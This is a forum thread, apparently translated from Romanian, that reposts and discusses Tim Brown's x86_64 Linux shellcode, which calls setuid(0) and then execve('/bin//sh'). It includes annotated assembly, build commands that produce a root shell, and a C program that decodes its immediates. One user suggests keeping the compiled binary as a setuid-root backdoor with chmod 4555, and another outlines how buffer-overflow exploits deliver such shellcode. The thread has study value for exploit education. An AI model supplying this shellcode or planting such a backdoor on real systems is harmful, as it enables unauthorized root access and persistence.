Nytro

setuid(0) + execve("/bin/sh") on x86_64 GNU/Linux


# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the Nth Dimension nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# (c) Tim Brown, 2009
# <mailto:timb@nth-dimension.org.uk>
# <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
#
# setuid(0) + execve("/bin/sh") on x86_64 GNU/Linux

.text
.globl _start
_start:
# uid = 0
xor %edi, %edi # set %edi (and so %rdi, the first syscall argument) to 0
# setuid
mov $0x69, %al # set %al to 0x69 = 105 (setuid); only the low byte of %rax is written
syscall # enter the kernel
# *filename = "/bin//sh"
xor %ax, %ax # set %ax to 0
push %ax # push %ax on to the stack (two zero bytes, the string terminator)
movq $0x68732f2f6e69622f, %rbx # set %rbx to "hs//nib/", which is "/bin//sh" once stored little-endian
pushq %rbx # push %rbx on to the stack
movq %rsp, %rdi # set %rdi to %rsp (pointer to "/bin//sh")
# **argv = [0, *filename]
xorq %rcx, %rcx # set %rcx to 0
pushq %rcx # push %rcx on to the stack (NULL that terminates argv)
pushq %rdi # push %rdi on to the stack (argv[0] = filename)
movq %rsp, %rsi # set %rsi to %rsp (pointer to argv)
# execve (%rdx, envp, is not set here and is used as found)
mov $0x3b, %al # set %al to 0x3b = 59 (execve); assumes the rest of %rax is still 0, i.e. setuid returned 0
syscall # enter the kernel

I posted it because it is explained.

Source: http://www.nth-dimension.org.uk/pub/setuid_execve_x86_64_Linux.asm


[root@#KaNaDa-TeaM BackDoor:/root]# gcc a.s -o shel
/tmp/ccuIeglI.o: In function `_start':
(.text+0x0): multiple definition of `_start'
/usr/lib/gcc/x86_64-redhat-linux/4.4.6/../../../../lib64/crt1.o:(.text+0x0): first defined here
/usr/lib/gcc/x86_64-redhat-linux/4.4.6/../../../../lib64/crt1.o: In function `_start':
(.text+0x20): undefined reference to `main'
collect2: ld returned 1 exit status

[root@#KaNaDa-TeaM BackDoor:/root]# gcc a.s -o shell
/tmp/cchulhnB.o: In function `_start':
(.text+0x0): multiple definition of `_start'
/usr/lib/gcc/x86_64-redhat-linux/4.4.6/../../../../lib64/crt1.o:(.text+0x0): first defined here
/usr/lib/gcc/x86_64-redhat-linux/4.4.6/../../../../lib64/crt1.o: In function `_start':
(.text+0x20): undefined reference to `main'
collect2: ld returned 1 exit status


It won't compile no matter what I do, damn it. Did anyone get it working?

EDIT: I got it working, maybe it helps someone...


[root@x] ~/test2
$ wget http://www.nth-dimension.org.uk/pub/setuid_execve_x86_64_Linux.asm
[ bla bla ]

[root@x] ~/test2
$ ls
setuid_execve_x86_64_Linux.asm

[root@x] ~/test2
$ mv setuid_execve_x86_64_Linux.asm setuid_execve_x86_64_Linux.s

[root@x] ~/test2
$ gcc setuid_execve_x86_64_Linux.s -c -o setuid_execve_x86_64_Linux

[root@x] ~/test2
$ ld setuid_execve_x86_64_Linux -o setuid_execve_x86_64_Linux_compiled

[root@x] ~/test2
$ chmod +x setuid_execve_x86_64_Linux_compiled

[root@x] ~/test2
$ ./setuid_execve_x86_64_Linux_compiled
# whoami
root
#
#
# whatido
/bin//sh: 4: whatido: not found
#
#
# id
uid=0(root) gid=0(root) groups=0(root)
#
#

Edited by kNigHt

It's fine, I read it before posting, that's why I posted it.

There are 2 syscalls:

- setuid

- execve

They match the ones here: Ryan A. Chapman | Linux System Call Table for x86_64

And that "line" is "hs//nib/" => /bin/sh

I wasn't saying there's something bad in it, I meant that if you already run it as uid 0, what's the point? :))

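As an added example (not from the thread and not from Tim Brown's file), this C program decodes the immediate the shellcode pushes and models the "mov $nr, %al" instructions, which write only the low byte of %rax: when setuid(0) fails with -EPERM (-1) for an unprivileged user, %rax never becomes 59, which is consistent with the segmentation fault reported later in the thread for a run without sudo. The syscall numbers 0x69 and 0x3b are the ones in the posted code.

```c
/* Added example, not part of the thread or of Tim Brown's file. Decodes the
 * immediates used by the posted shellcode and models "mov $nr, %al". */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define BIN_SH_IMM 0x68732f2f6e69622fULL /* movq $0x68732f2f6e69622f, %rbx */
#define SYS_SETUID_NR 0x69               /* mov $0x69, %al -> 105 */
#define SYS_EXECVE_NR 0x3b               /* mov $0x3b, %al -> 59 */

/* Store the immediate as the CPU does (little-endian) and terminate it.
 * On the real stack the terminator comes from the preceding "push %ax". */
void decode_imm(uint64_t imm, char out[9]) {
    for (int i = 0; i < 8; i++)
        out[i] = (char)((imm >> (8 * i)) & 0xff);
    out[8] = '\0';
}

/* 1 if the immediate spells the expected path, else 0. */
int imm_spells(uint64_t imm, const char *expect) {
    char s[9];
    decode_imm(imm, s);
    return strcmp(s, expect) == 0;
}

/* "mov $nr, %al" replaces only bits 0..7 of %rax; bits 8..63 stay. */
uint64_t set_al(uint64_t rax, uint8_t nr) {
    return (rax & ~(uint64_t)0xff) | nr;
}

/* %rax after "mov $0x3b, %al", given what the setuid syscall returned:
 * 0 on success, -errno (for example -1 for EPERM) when the caller is not root. */
uint64_t execve_nr_after_setuid(int64_t setuid_ret) {
    return set_al((uint64_t)setuid_ret, SYS_EXECVE_NR);
}

int main(void) {
    char path[9];
    decode_imm(BIN_SH_IMM, path);
    printf("immediate decodes to \"%s\"\n", path);   /* "/bin//sh" */
    printf("syscall numbers: setuid=%d execve=%d\n", SYS_SETUID_NR, SYS_EXECVE_NR);
    /* root: setuid returned 0, so %rax becomes exactly 59 = execve */
    printf("after setuid ok:    rax=0x%llx\n", (unsigned long long)execve_nr_after_setuid(0));
    /* non-root: setuid returned -1, so %rax becomes 0xffffffffffffff3b, not a
     * valid syscall number; the kernel answers -ENOSYS and execution runs
     * off the end of the code instead of starting /bin//sh */
    printf("after setuid EPERM: rax=0x%llx\n", (unsigned long long)execve_nr_after_setuid(-1));
    return 0;
}
```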

I did exactly the same thing as knight and I get the following errors when compiling:

setuid_execve_x86_64_Linux.s: Assembler messages:
setuid_execve_x86_64_Linux.s:42: Error: bad register name `%rbx'
setuid_execve_x86_64_Linux.s:43: Error: bad register name `%rbx'
setuid_execve_x86_64_Linux.s:44: Error: bad register name `%rsp'
setuid_execve_x86_64_Linux.s:46: Error: bad register name `%rcx'
setuid_execve_x86_64_Linux.s:47: Error: bad register name `%rcx'
setuid_execve_x86_64_Linux.s:48: Error: bad register name `%rdi'
setuid_execve_x86_64_Linux.s:49: Error: bad register name `%rsp'

I guess it's on my end, since it worked for you. Any ideas?


Is the server x86_64? Run uname -i

Oops, my bad. I wasn't paying attention, I tested it on an i386. I just tried it on an x86_64 as well and it works. Thanks!

Regarding your post addressed to knight, as far as I can see he didn't run it as root, he only became root after running it.



I know $ is part of a (non-root) user's prompt, but it depends on the distribution, I was just curious :) Honestly I still haven't tested it, I'm curious which kernel versions it works on and when it was fixed.


there's no point, it only works when run as root...

shaggi@gmail:~$ sudo ./shell
# exit
shaggi@gmail:~$ ./shell
Segmentation fault
shaggi@gmail:~$ uname -r -i
2.6.32-042stab078.28 x86_64
shaggi@gmail:~$

Later edit: it's good as a backdoor with chmod 4555, i.e. -r-sr-xr-x

Edited by shaggi

Of course, it's not an EXPLOIT, it's SHELLCODE.

See the tutorials made by neox.

In short:

1. You have a program/server (Apache HTTPD for example) on Linux
2. That program has a static buffer: char buffer[100]
3. When you open a web page: GET /pagina.php HTTP/1.1, that line is put into that buffer
4. If you send more than 100 characters: GET /paginaaaaaaaaaaaaaaaaaaaaaaaaaa...aaaaaaaaaaaaaaa.php, the size of that buffer is exceeded
5. Whatever overflows that buffer can, under optimal conditions, overwrite EIP (the code being executed)
6. By exploiting this problem you get the ability to run code, like the one above, shellcode, instead of that program's code
7. The code (above) executes and gives you a shell, so that you, bad person, can run bad commands

That's just the idea, very briefly.

It does NOT exploit a problem in the kernel to make you root. It just opens a shell.

See this: setuid - Wikipedia, the free encyclopedia



I highlighted it.



#uname -a

Please post the result of this command
